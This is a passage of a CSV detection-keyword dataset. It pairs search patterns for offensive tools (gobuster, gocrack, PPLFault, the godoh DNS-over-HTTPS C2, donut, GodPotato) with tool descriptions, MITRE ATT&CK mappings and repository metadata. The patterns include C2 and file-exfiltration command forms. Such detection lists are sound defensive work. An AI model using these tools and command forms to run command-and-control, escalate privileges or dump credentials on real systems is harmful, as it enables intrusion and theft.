"*gobuster dns*",".{0,1000}gobuster\sdns.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46512"
"*gobuster fuzz -*",".{0,1000}gobuster\sfuzz\s\-.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46513"
"*gobuster gcs *",".{0,1000}gobuster\sgcs\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46514"
"*gobuster s3 *",".{0,1000}gobuster\ss3\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46515"
"*gobuster tftp *",".{0,1000}gobuster\stftp\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46516"
"*gobuster vhost -u *",".{0,1000}gobuster\svhost\s\-u\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46517"
"*gobuster vhost*",".{0,1000}gobuster\svhost.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46518"
"*gobuster*",".{0,1000}gobuster.{0,1000}","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Exploitation tool","https://github.com/OJ/gobuster","1","1","#linux","N/A","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46519"
"*gobuster_*.tar.gz*",".{0,1000}gobuster_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46520"
"*gobuster_*.zip*",".{0,1000}gobuster_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46521"
"*gobusterfuzz*",".{0,1000}gobusterfuzz.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46522"
"*gobustertftp*",".{0,1000}gobustertftp.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46523"
"*gocrack@password.crackers.local*",".{0,1000}gocrack\@password\.crackers\.local.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","46524"
"*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*",".{0,1000}gocrack_v.{0,1000}_darwin_x64_hashcat_v3_6_0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","46525"
"*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*",".{0,1000}gocrack_v.{0,1000}_linux_x64_hashcat_v3_6_0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","46526"
"*GodFault.exe*",".{0,1000}GodFault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46527"
"*GodFault\GodFault*",".{0,1000}GodFault\\GodFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46528"
"*godoh -*",".{0,1000}godoh\s\-.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46529"
"*godoh agent*",".{0,1000}godoh\sagent.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46530"
"*godoh c2*",".{0,1000}godoh\sc2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46531"
"*godoh --domain*",".{0,1000}godoh\s\-\-domain.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46532"
"*godoh help*",".{0,1000}godoh\shelp.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46533"
"*godoh receive*",".{0,1000}godoh\sreceive.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46534"
"*godoh send*",".{0,1000}godoh\ssend.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46535"
"*godoh test --*",".{0,1000}godoh\stest\s\-\-.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46536"
"*godoh test*",".{0,1000}godoh\stest.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46537"
"*godoh* --agent-name *--poll-time*",".{0,1000}godoh.{0,1000}\s\-\-agent\-name\s.{0,1000}\-\-poll\-time.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46538"
"*godoh* --domain * c2*",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}\sc2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46539"
"*godoh* --domain * receive*",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}\sreceive.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46540"
"*godoh* --domain *send --file *",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}send\s\-\-file\s.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46541"
"*godoh-darwin64*",".{0,1000}godoh\-darwin64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","#linux","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46542"
"*godoh-darwin64*",".{0,1000}godoh\-darwin64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","#linux","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46543"
"*godoh-linux64*",".{0,1000}godoh\-linux64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","#linux","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46544"
"*godoh-linux64*",".{0,1000}godoh\-linux64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","#linux","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46545"
"*godoh-windows32.*",".{0,1000}godoh\-windows32\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46546"
"*godoh-windows32.exe*",".{0,1000}godoh\-windows32\.exe.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46547"
"*godoh-windows64.*",".{0,1000}godoh\-windows64\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46548"
"*godoh-windows64.exe*",".{0,1000}godoh\-windows64\.exe.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","46549"
"*go-donut/*.exe*",".{0,1000}go\-donut\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","46550"
"*go-donut/*.go*",".{0,1000}go\-donut\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","46551"
"*GodPotato -*",".{0,1000}GodPotato\s\-.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46552"
"*godpotato.cna*",".{0,1000}godpotato\.cna.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","0","N/A","N/A","9","1","85","9","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z","46553"
"*GodPotato.cs*",".{0,1000}GodPotato\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46554"
"*GodPotato.exe*",".{0,1000}GodPotato\.exe.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","46555"
"*godpotato.exe*",".{0,1000}godpotato\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46556"
"*GodPotato.git*",".{0,1000}GodPotato\.git.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46557"
"*GodPotato-Aggressor-Script*",".{0,1000}GodPotato\-Aggressor\-Script.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","1","N/A","N/A","9","1","85","9","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z","46558"
"*GodPotatoContext was not initialized*",".{0,1000}GodPotatoContext\swas\snot\sinitialized.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","46559"
"*GodPotatoContext was not initialized*",".{0,1000}GodPotatoContext\swas\snot\sinitialized.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","46560"
"*GodPotatoContext.cs*",".{0,1000}GodPotatoContext\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46561"
"*GodPotato-master.zip*",".{0,1000}GodPotato\-master\.zip.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46562"
"*GodPotato-NET*.exe*",".{0,1000}GodPotato\-NET.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46563"
"*GodPotato-NET2.exe*",".{0,1000}GodPotato\-NET2\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46564"
"*GodPotato-NET35.exe*",".{0,1000}GodPotato\-NET35\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46565"
"*GodPotato-NET4.exe*",".{0,1000}GodPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46566"
